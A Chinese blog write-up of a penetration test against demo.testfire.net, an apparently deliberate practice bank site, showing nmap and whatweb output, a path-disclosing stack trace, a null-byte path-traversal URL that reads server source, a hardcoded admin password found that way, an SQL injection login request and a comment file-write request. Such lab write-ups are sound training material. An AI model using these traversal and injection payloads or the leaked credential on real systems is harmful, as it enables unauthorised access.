demo.testfire.net 靶场测试流程记录

demo.testfire.net

信息搜集

域名

IP 端口信息

 
 
 
1
 
 
 
 
1
65.61.137.117
2

 
 
 
nmap 信息
 
 
 
x
 
 
 
 
 
1
root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117
2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT
3
Nmap scan report for 65.61.137.117
4
Host is up (0.60s latency).
5
Not shown: 995 closed ports
6
PORT     STATE    SERVICE      VERSION
7
80/tcp   open     http         Microsoft IIS httpd 8.0
8
| http-cookie-flags: 
9
|   /: 
10
|     amSessionId: 
11
|_      httponly flag not set
12
| http-methods: 
13
|_  Potentially risky methods: TRACE
14
|_http-server-header: Microsoft-IIS/8.0
15
|_http-title: Altoro Mutual
16
443/tcp  open     ssl/http     Microsoft IIS httpd 8.0
17
| http-cookie-flags: 
18
|   /: 
19
|     amSessionId: 
20
|_      httponly flag not set
21
| http-methods: 
22
|_  Potentially risky methods: TRACE
23
|_http-server-header: Microsoft-IIS/8.0
24
|_http-title: Altoro Mutual
25
| ssl-cert: Subject: commonName=demo.testfire.net
26
| Not valid before: 2014-07-01T09:54:37
27
|_Not valid after:  2019-12-22T09:54:37
28
|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.
29
445/tcp  filtered microsoft-ds
30
514/tcp  filtered shell
31
4444/tcp filtered krb524
32
Device type: general purpose
33
Running: Microsoft Windows XP|7|2012
34
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
35
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
36
Network Distance: 2 hops
37
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
38

39
Host script results:
40
|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s
41

42
TRACEROUTE (using port 1723/tcp)
43
HOP RTT      ADDRESS
44
1   5.10 ms  192.168.245.2
45
2   26.32 ms 65.61.137.117
46

47
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
48
Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds
49

 
 

 

中间件


 
 
 
x
 
 
 
 
 
1
root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/
2
http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]
 
 

总结

  • windows 服务器 , asp.net (aspx) . iis8
  • 靶机网站, 域名, cdn 等信息无需搜集
 

漏洞挖掘

错误日志,泄露物理路径

GET 请求访问 http://demo.testfire.net/comment.aspx
 
 
 
 
 
 
 
 
 
1
An Error Has Occurred
2
Summary:
3
Value cannot be null.
4

5
Error Message:
6
System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
 
 
 
疑似程序路径

 
 
 
x
 
 
 
 
 
1
c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31
 
 
 

登录处无验证码 ( maybe 暴力破解)

 
 
 
x
 
 
 
 
 
1
http://www.altoromutual.com/bank/login.aspx
 
 
 

任意文件内容读取

 
查看 login.aspx 的源代码
 
 
 
x
 
 
 
 
 
1
http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt
 
 
给出不存在的文件会报出目录信息

 
 
 
 
 
 
 
 
 
1
Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
2
        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.
3
            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
4
            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
5
            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
6
            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
7
            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
8
            at System.IO.StreamReader..ctor(String path)
9
            at System.IO.File.OpenText(String path)
10
            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42
11
            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70
12
            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
13
            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
14
            at System.Web.UI.Control.OnLoad(EventArgs e)
15
            at System.Web.UI.Control.LoadRecursive()
16
            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
 
 
 
读取 /admin/login.aspx 的源码 拿到 管理员的密码
 
 
 
x
 
 
 
 
 
1
if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234") 
 
 

SQL 注入

 
 
 
 
 
 
 
 
 
1
POST /bank/login.aspx HTTP/1.1
2
Host: demo.testfire.net
3
Content-Length: 45
4
Cache-Control: max-age=0
5
Origin: http://demo.testfire.net
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://demo.testfire.net/bank/login.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288
14
Connection: close
15

16
uid=hac425%27&passw=%27%27%27&btnSubmit=Login
 
 
 

写文件

貌似只能写 txt , 写 aspx 访问不了
 
 
 
x
 
 
 
 
 
1
POST /comment.aspx HTTP/1.1
2
Host: www.altoromutual.com
3
Content-Length: 111
4
Cache-Control: max-age=0
5
Origin: http://www.altoromutual.com
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://www.altoromutual.com/feedback.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004
14
Connection: close
15

16
cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+
 
 
 
 
 
 
 
 
 
 
 
posted @ 2018-08-18 20:59  hac425  阅读(4938)  评论(0编辑  收藏  举报